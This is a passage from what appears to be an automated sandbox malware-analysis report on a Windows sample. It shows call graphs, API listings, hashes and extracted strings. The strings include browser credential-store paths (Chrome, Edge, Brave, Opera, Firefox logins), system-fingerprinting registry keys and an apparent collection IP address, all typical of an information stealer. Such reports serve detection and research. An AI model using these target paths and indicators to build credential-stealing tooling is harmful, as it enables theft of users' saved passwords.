            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E39645B
              • Part of subcall function 00007FF71E39B508: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF71E39107B), ref: 00007FF71E39B522
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E3964B3
            • memset.VCRUNTIME140 ref: 00007FF71E3964CB
              • Part of subcall function 00007FF71E396810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF71E39684A
              • Part of subcall function 00007FF71E396810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF71E396866
              • Part of subcall function 00007FF71E396810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF71E396898
            • GetModuleFileNameA.KERNEL32 ref: 00007FF71E3964E9
              • Part of subcall function 00007FF71E3999F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399A69
              • Part of subcall function 00007FF71E3999F0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399A89
              • Part of subcall function 00007FF71E3999F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399A99
              • Part of subcall function 00007FF71E3999F0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399B7C
              • Part of subcall function 00007FF71E3999F0: ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399B83
              • Part of subcall function 00007FF71E3999F0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399B90
              • Part of subcall function 00007FF71E3999F0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399AE6
              • Part of subcall function 00007FF71E3999F0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399B0F
              • Part of subcall function 00007FF71E3999F0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399B36
            • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF71E3965E3
            • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF71E3965F0
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E3966A5
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E39672C
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E39676E
            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF71E3967C0
              • Part of subcall function 00007FF71E391310: ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FF71E39131B
            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF71E396804
              • Part of subcall function 00007FF71E391270: __std_exception_copy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,00007FF71E39B543), ref: 00007FF71E3912B4
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$U?$char_traits@$D@std@@@std@@$memset$U?$char_traits@_W@std@@@std@@memcpy$??1?$basic_ios@??1?$basic_iostream@?good@ios_base@std@@?sputc@?$basic_streambuf@OpenValueWindow$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??6?$basic_ostream@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CloseConcurrency::cancel_current_taskConsoleD@std@@@1@@FileGlobalMemoryModuleNameOsfx@?$basic_ostream@_ShowStatusV01@_V12@V?$basic_streambuf@Xlength_error@std@@__std_exception_copymalloc
            • String ID: ADAPTERS INFO:$CPU INFO:$DISK INFO:$DOMAIN AND TZ INFO:$LOCALE INFO:$PROCESSES RUNNING:$RAM INFO:$USERS INFO:$ IP: $ MB$185.237.165.97$@$Executable Path: $MACHINE INFO:$Total Physical Memory:
            • API String ID: 2962708308-876331821
            • Opcode ID: 78ca8f3ea93cc4dce07aa16f4b426c758c50c3dba67c8c715aa85aa09049716b
            • Instruction ID: 119d01fddd837e4900d3951de344129f38c7510aca60016230c75beb4d5a98c8
            • Opcode Fuzzy Hash: 78ca8f3ea93cc4dce07aa16f4b426c758c50c3dba67c8c715aa85aa09049716b
            • Instruction Fuzzy Hash: D352B362F19E4695EB10EB64D4403BDA361FB447B4F80563AEA6D43AD9DF2CF488C320

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 715 7ff71e395510-7ff71e39555e malloc 716 7ff71e395570-7ff71e3955d4 GetEnvironmentVariableW call 7ff71e398280 free call 7ff71e399e30 call 7ff71e3950e0 715->716 717 7ff71e395560-7ff71e39556b 715->717 727 7ff71e395610-7ff71e39564c call 7ff71e399e30 call 7ff71e3950e0 716->727 728 7ff71e3955d6-7ff71e3955ed 716->728 718 7ff71e395d4b-7ff71e395d79 call 7ff71e39b4e0 717->718 736 7ff71e395651-7ff71e39565d 727->736 730 7ff71e3955ef-7ff71e395602 728->730 731 7ff71e39560b call 7ff71e39b500 728->731 730->731 733 7ff71e395604-7ff71e39560a _invalid_parameter_noinfo_noreturn 730->733 731->727 733->731 737 7ff71e39565f-7ff71e395678 736->737 738 7ff71e39569b-7ff71e3957f3 call 7ff71e399e30 * 8 call 7ff71e3990c0 call 7ff71e399e30 call 7ff71e39ac60 736->738 739 7ff71e395696 call 7ff71e39b500 737->739 740 7ff71e39567a-7ff71e39568d 737->740 765 7ff71e395830-7ff71e39584a call 7ff71e39a9d0 738->765 766 7ff71e3957f5-7ff71e39582e memcpy 738->766 739->738 740->739 742 7ff71e39568f-7ff71e395695 _invalid_parameter_noinfo_noreturn 740->742 742->739 767 7ff71e39584f-7ff71e3958f2 call 7ff71e3990c0 call 7ff71e399e30 call 7ff71e39ac60 765->767 766->767 775 7ff71e39592f-7ff71e395949 call 7ff71e39a9d0 767->775 776 7ff71e3958f4-7ff71e39592d memcpy 767->776 777 7ff71e39594e-7ff71e3959f9 call 7ff71e39b508 775->777 776->777 781 7ff71e395a00-7ff71e395a24 call 7ff71e3994e0 777->781 784 7ff71e395a26-7ff71e395a5d call 7ff71e39a1c0 call 7ff71e39b544 781->784 789 7ff71e395a5f-7ff71e395a76 784->789 790 7ff71e395a99-7ff71e395aad 784->790 791 7ff71e395a94 call 7ff71e39b500 789->791 792 7ff71e395a78-7ff71e395a8b 789->792 793 7ff71e395aaf-7ff71e395ac5 790->793 794 7ff71e395ae8-7ff71e395afa 790->794 791->790 792->791 799 7ff71e395a8d-7ff71e395a93 _invalid_parameter_noinfo_noreturn 792->799 795 7ff71e395ae3 call 7ff71e39b500 793->795 796 7ff71e395ac7-7ff71e395ada 793->796 797 7ff71e395b36-7ff71e395b3f 794->797 798 7ff71e395afc-7ff71e395b12 794->798 795->794 796->795 801 7ff71e395adc-7ff71e395ae2 _invalid_parameter_noinfo_noreturn 796->801 805 7ff71e395b41-7ff71e395b58 797->805 806 7ff71e395b7b-7ff71e395b8f 797->806 803 7ff71e395b30-7ff71e395b35 call 7ff71e39b500 798->803 804 7ff71e395b14-7ff71e395b27 798->804 799->791 801->795 803->797 804->803 809 7ff71e395b29-7ff71e395b2f _invalid_parameter_noinfo_noreturn 804->809 811 7ff71e395b76 call 7ff71e39b500 805->811 812 7ff71e395b5a-7ff71e395b6d 805->812 807 7ff71e395b91-7ff71e395ba7 806->807 808 7ff71e395bca-7ff71e395bdc 806->808 814 7ff71e395bc5 call 7ff71e39b500 807->814 815 7ff71e395ba9-7ff71e395bbc 807->815 816 7ff71e395c17-7ff71e395c57 808->816 817 7ff71e395bde-7ff71e395bf4 808->817 809->803 811->806 812->811 819 7ff71e395b6f-7ff71e395b75 _invalid_parameter_noinfo_noreturn 812->819 814->808 815->814 820 7ff71e395bbe-7ff71e395bc4 _invalid_parameter_noinfo_noreturn 815->820 824 7ff71e395c90-7ff71e395cb2 816->824 825 7ff71e395c59-7ff71e395c6d 816->825 822 7ff71e395c12 call 7ff71e39b500 817->822 823 7ff71e395bf6-7ff71e395c09 817->823 819->811 820->814 822->816 823->822 828 7ff71e395c0b-7ff71e395c11 _invalid_parameter_noinfo_noreturn 823->828 826 7ff71e395cf3-7ff71e395d0d 824->826 827 7ff71e395cb4-7ff71e395cc8 824->827 830 7ff71e395c6f-7ff71e395c82 825->830 831 7ff71e395c8b call 7ff71e39b500 825->831 826->718 836 7ff71e395d0f-7ff71e395d28 826->836 834 7ff71e395ce6-7ff71e395ceb call 7ff71e39b500 827->834 835 7ff71e395cca-7ff71e395cdd 827->835 828->822 830->831 832 7ff71e395c84-7ff71e395c8a _invalid_parameter_noinfo_noreturn 830->832 831->824 832->831 834->826 835->834 837 7ff71e395cdf-7ff71e395ce5 _invalid_parameter_noinfo_noreturn 835->837 839 7ff71e395d46 call 7ff71e39b500 836->839 840 7ff71e395d2a-7ff71e395d3d 836->840 837->834 839->718 840->839 842 7ff71e395d3f-7ff71e395d45 _invalid_parameter_noinfo_noreturn 840->842 842->839
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$EnvironmentVariablefreemalloc
            • String ID: ?????? ??????: $USERPROFILE$\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login Data$\AppData\Local\Chromium\User Data\Default\Login Data$\AppData\Local\Google\Chrome Beta\User Data\Default\Login Data$\AppData\Local\Google\Chrome\User Data\Default\Login Data$\AppData\Local\Microsoft\Edge\User Data\Default\Login Data$\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data$\AppData\Roaming\Mozilla\Firefox\Profiles$\AppData\Roaming\Mozilla\Firefox\Profiles\$\AppData\Roaming\Opera Software\Opera GX Stable\Login Data$\AppData\Roaming\Opera Software\Opera Stable\Login Data$\logins.json$\times.json$defa$rele$rele
            • API String ID: 716798019-1786275549
            • Opcode ID: 6cc58d25d150a11c04d09ad9526df1c6553d4a93c87f7054ba76d3d6c4800458
            • Instruction ID: c11210dd580824cf88c0e4b0d6107ab5debedf69b7099d6e8ca6aa2aafef225b
            • Opcode Fuzzy Hash: 6cc58d25d150a11c04d09ad9526df1c6553d4a93c87f7054ba76d3d6c4800458
            • Instruction Fuzzy Hash: D132A372A14FC695EB20AF25D8443ED6361FB847A4F805236DA5D17BE9DF38E688C310

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 844 7ff71e394a40-7ff71e394b1b call 7ff71e39c530 memset * 5 call 7ff71e396810 RegOpenKeyExA 849 7ff71e394b97-7ff71e394bc0 RegOpenKeyExA 844->849 850 7ff71e394b1d-7ff71e394b54 RegGetValueA 844->850 851 7ff71e394bc2-7ff71e394bf9 RegGetValueA 849->851 852 7ff71e394c3c-7ff71e394c65 RegOpenKeyExA 849->852 853 7ff71e394b84-7ff71e394b8f RegCloseKey 850->853 854 7ff71e394b56-7ff71e394b7f call 7ff71e3999f0 * 3 850->854 855 7ff71e394c29-7ff71e394c34 RegCloseKey 851->855 856 7ff71e394bfb-7ff71e394c24 call 7ff71e3999f0 * 3 851->856 857 7ff71e394c6b-7ff71e394ca2 RegGetValueA 852->857 858 7ff71e394d4c-7ff71e394d78 852->858 853->849 854->853 855->852 856->855 863 7ff71e394cd2-7ff71e394d09 RegGetValueA 857->863 864 7ff71e394ca4-7ff71e394ccd call 7ff71e3999f0 * 3 857->864 861 7ff71e394d7a-7ff71e394d84 858->861 862 7ff71e394d9b-7ff71e394d9e 858->862 861->862 871 7ff71e394d86-7ff71e394d99 861->871 866 7ff71e394da0-7ff71e394daa 862->866 867 7ff71e394dc2-7ff71e394dc7 862->867 868 7ff71e394d39-7ff71e394d44 RegCloseKey 863->868 869 7ff71e394d0b-7ff71e394d34 call 7ff71e3999f0 * 3 863->869 864->863 866->867 876 7ff71e394dac-7ff71e394dc0 866->876 877 7ff71e394dcc-7ff71e394dcf 867->877 868->858 869->868 871->877 876->877 882 7ff71e394dd1-7ff71e394dd9 call 7ff71e3996c0 877->882 883 7ff71e394dda-7ff71e394e45 call 7ff71e397c10 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff71e39b4e0 877->883 882->883
            APIs
            • memset.VCRUNTIME140(?), ref: 00007FF71E394A96
            • memset.VCRUNTIME140(?), ref: 00007FF71E394AAA
            • memset.VCRUNTIME140(?), ref: 00007FF71E394ABE
            • memset.VCRUNTIME140(?), ref: 00007FF71E394AD2
            • memset.VCRUNTIME140(?), ref: 00007FF71E394AE3
              • Part of subcall function 00007FF71E396810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF71E39684A
              • Part of subcall function 00007FF71E396810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF71E396866
              • Part of subcall function 00007FF71E396810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF71E396898
            • RegOpenKeyExA.KERNELBASE(?), ref: 00007FF71E394B13
            • RegGetValueA.KERNELBASE ref: 00007FF71E394B4C
            • RegCloseKey.KERNELBASE ref: 00007FF71E394B89
            • RegOpenKeyExA.KERNELBASE ref: 00007FF71E394BB8
            • RegGetValueA.KERNELBASE ref: 00007FF71E394BF1
            • RegCloseKey.ADVAPI32 ref: 00007FF71E394C2E
            • RegOpenKeyExA.KERNELBASE ref: 00007FF71E394C5D
            • RegGetValueA.KERNELBASE ref: 00007FF71E394C9A
            • RegGetValueA.KERNELBASE ref: 00007FF71E394D01
            • RegCloseKey.KERNELBASE ref: 00007FF71E394D3E
            • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF71E394E0F
            • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF71E394E19
              • Part of subcall function 00007FF71E3999F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399A69
              • Part of subcall function 00007FF71E3999F0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399A89
              • Part of subcall function 00007FF71E3999F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399A99
              • Part of subcall function 00007FF71E3999F0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399B7C
              • Part of subcall function 00007FF71E3999F0: ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399B83
              • Part of subcall function 00007FF71E3999F0: ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399B90
              • Part of subcall function 00007FF71E3999F0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399AE6
              • Part of subcall function 00007FF71E3999F0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399B0F
              • Part of subcall function 00007FF71E3999F0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399B36
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: U?$char_traits@$D@std@@@std@@$memset$Value$CloseOpenU?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_iostream@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@D@std@@@1@@Osfx@?$basic_ostream@_V12@V?$basic_streambuf@
            • String ID: BaseBoardProduct$DisplayVersion$HARDWARE\DESCRIPTION\System\BIOS$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Machine name: $OS display version: $OS name: $Processor name: $ProcessorNameString$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
            • API String ID: 20268565-1502927450
            • Opcode ID: 12b30c537c136771721c78f4a9f3bda910a894ae6b1a0a306b9aab14cf318f64
            • Instruction ID: ce7fa7781d7684cf96dc91ae4aeb6b2f109578fd64a7262ff3b68a68ac0101db
            • Opcode Fuzzy Hash: 12b30c537c136771721c78f4a9f3bda910a894ae6b1a0a306b9aab14cf318f64
            • Instruction Fuzzy Hash: EFB12476A18F4195EB10EF26D8802E9B3A4FF84794F80413AEA8D47769DF3CE549C760

            Control-flow Graph

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: Http$CloseHandle$DataOpenRequestmemcpy$AvailableConnectQueryReadReceiveResponseSend_invalid_parameter_noinfo_noreturnmemset
            • String ID: GET$Unable to get IP$WinHTTP/1.0$api.ipify.org
            • API String ID: 849217320-4095685055
            • Opcode ID: 426cd13cdefd68514cd9776234f4fe134a6db36eb49d0d2c03f415de3107bc4e
            • Instruction ID: 9931720ed1314a65cb26c2dcc4f555b10097ce0e7efcd97d184a2c367f711ab0
            • Opcode Fuzzy Hash: 426cd13cdefd68514cd9776234f4fe134a6db36eb49d0d2c03f415de3107bc4e
            • Instruction Fuzzy Hash: 3F619832A18F4192EA10EB26E45036AB7E0FB85BA4F944539EA4D03B54DF3DF489C760

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 979 7ff71e394640-7ff71e3946a0 GetLocaleInfoA 980 7ff71e3946a2-7ff71e3946c2 call 7ff71e39a0c0 979->980 981 7ff71e3946c7-7ff71e3946e2 979->981 986 7ff71e394785-7ff71e3947af call 7ff71e39b4e0 980->986 982 7ff71e3946e5-7ff71e3946ec 981->982 982->982 984 7ff71e3946ee-7ff71e394722 call 7ff71e39a0c0 GetLocaleInfoA 982->984 990 7ff71e3947b0-7ff71e3947bf 984->990 991 7ff71e394728-7ff71e394751 call 7ff71e39a0c0 984->991 993 7ff71e3947c6-7ff71e3947cd 990->993 991->986 998 7ff71e394753-7ff71e394765 991->998 993->993 995 7ff71e3947cf-7ff71e394902 call 7ff71e39a0c0 memset ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ call 7ff71e3999f0 call 7ff71e39b250 call 7ff71e3999f0 call 7ff71e39b250 call 7ff71e3999f0 993->995 1014 7ff71e394904-7ff71e39490e 995->1014 1015 7ff71e394925-7ff71e394928 995->1015 1000 7ff71e394780 call 7ff71e39b500 998->1000 1001 7ff71e394767-7ff71e39477a 998->1001 1000->986 1001->1000 1003 7ff71e394a33-7ff71e394a39 _invalid_parameter_noinfo_noreturn 1001->1003 1014->1015 1018 7ff71e394910-7ff71e394923 1014->1018 1016 7ff71e39492a-7ff71e394934 1015->1016 1017 7ff71e39494c-7ff71e394951 1015->1017 1016->1017 1020 7ff71e394936-7ff71e39494a 1016->1020 1019 7ff71e394956-7ff71e394959 1017->1019 1018->1019 1021 7ff71e394964-7ff71e3949aa call 7ff71e397c10 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ 1019->1021 1022 7ff71e39495b-7ff71e394963 call 7ff71e3996c0 1019->1022 1020->1019 1027 7ff71e3949e1-7ff71e3949fc 1021->1027 1028 7ff71e3949ac-7ff71e3949be 1021->1028 1022->1021 1027->986 1029 7ff71e394a02-7ff71e394a14 1027->1029 1030 7ff71e3949c0-7ff71e3949d3 1028->1030 1031 7ff71e3949dc call 7ff71e39b500 1028->1031 1029->1000 1032 7ff71e394a1a-7ff71e394a2d 1029->1032 1030->1031 1033 7ff71e3949d5-7ff71e3949db _invalid_parameter_noinfo_noreturn 1030->1033 1031->1027 1032->1000 1032->1003 1033->1031
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2425312486.00007FF71E391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71E390000, based on PE: true
            • Associated: 00000000.00000002.2425300924.00007FF71E390000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425325471.00007FF71E39E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425340860.00007FF71E3A5000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2425358136.00007FF71E3A6000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff71e390000_Simple1.jbxd
            Similarity
            • API ID: U?$char_traits@$D@std@@@std@@$InfoLocale_invalid_parameter_noinfo_noreturn$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_ostream@D@std@@@1@_V?$basic_streambuf@memcpymemset
            • String ID: Country: $Failed to get locale$Language:
            • API String ID: 3095796567-568146128
            • Opcode ID: 3a663008a7502378d2806eca81fbefb42a121fb73892ebbc0818c89bd97be0f9
            • Instruction ID: 03595048fdc0b7260d67077cf10cb533b80f498486d7791d3c50c7ef1771b2be
            • Opcode Fuzzy Hash: 3a663008a7502378d2806eca81fbefb42a121fb73892ebbc0818c89bd97be0f9
            • Instruction Fuzzy Hash: A3B19372B18F8585EB10DF65D4803AD7760FB457A8F80423AEA5D17B98DF78E189C710

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1050 7ff71e393780-7ff71e3937fc GetLogicalDrives memset call 7ff71e396810 call 7ff71e3999f0 1055 7ff71e393800-7ff71e39380e 1050->1055 1056 7ff71e393814-7ff71e393890 call 7ff71e399610 1055->1056 1057 7ff71e39397a-7ff71e393981 1055->1057 1063 7ff71e393892-7ff71e3938a4 1056->1063 1064 7ff71e3938c4-7ff71e3938fe GetDiskFreeSpaceExA 1056->1064 1057->1055 1059 7ff71e393987-7ff71e3939b4 1057->1059 1061 7ff71e3939e5-7ff71e3939e8 1059->1061 1062 7ff71e3939b6-7ff71e3939c0 1059->1062 1066 7ff71e3939ea-7ff71e3939f4 1061->1066 1067 7ff71e393a0c-7ff71e393a11 1061->1067 1062->1061 1065 7ff71e3939c2-7ff71e3939d5 1062->1065 1068 7ff71e3938bf call 7ff71e39b500 1063->1068 1069 7ff71e3938a6-7ff71e3938b9 1063->1069 1070 7ff71e393900-7ff71e393940 call 7ff71e399820 call 7ff71e3999f0 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z call 7ff71e3999f0 1064->1070 1071 7ff71e393941-7ff71e39394a 1064->1071 1072 7ff71e393a16-7ff71e393a19 1065->1072 1066->1067 1073 7ff71e3939f6-7ff71e393a0a 1066->1073 1067->1072 1068->1064 1069->1068 1077 7ff71e3939d7-7ff71e3939dd _invalid_parameter_noinfo_noreturn 1069->1077 1070->1071 1071->1057 1076 7ff71e39394c-7ff71e39395e 1071->1076 1074 7ff71e393a24-7ff71e393a96 call 7ff71e397c10 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff71e39b4e0 1072->1074 1075 7ff71e393a1b-7ff71e393a23 call 7ff71e3996c0 1072->1075 1073->1072 1075->1074 1081 7ff71e393960-7ff71e393973 1076->1081 1082 7ff71e393975 call 7ff71e39b500 1076->1082 1084 7ff71e3939de-7ff71e3939e4 _invalid_parameter_noinfo_noreturn 1077->1084 1081->1082 1081->1084 1082->1057 1084->1061
            APIs
            • GetLogicalDrives.KERNELBASE ref: 00007FF71E3937C5
            • memset.VCRUNTIME140 ref: 00007FF71E3937DA
              • Part of subcall function 00007FF71E396810: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF71E39684A
              • Part of subcall function 00007FF71E396810: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140 ref: 00007FF71E396866
              • Part of subcall function 00007FF71E396810: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF71E396898
              • Part of subcall function 00007FF71E3999F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399A69
              • Part of subcall function 00007FF71E3999F0: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399A89
              • Part of subcall function 00007FF71E3999F0: ?good@ios_base@std@@QEBA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399A99
              • Part of subcall function 00007FF71E3999F0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399B7C
              • Part of subcall function 00007FF71E3999F0: ?uncaught_exception@std@@YA_NXZ.MSVCP140(?,00000000,00000000,?,00007FF71E3919FA), ref: 00007FF71E399B83
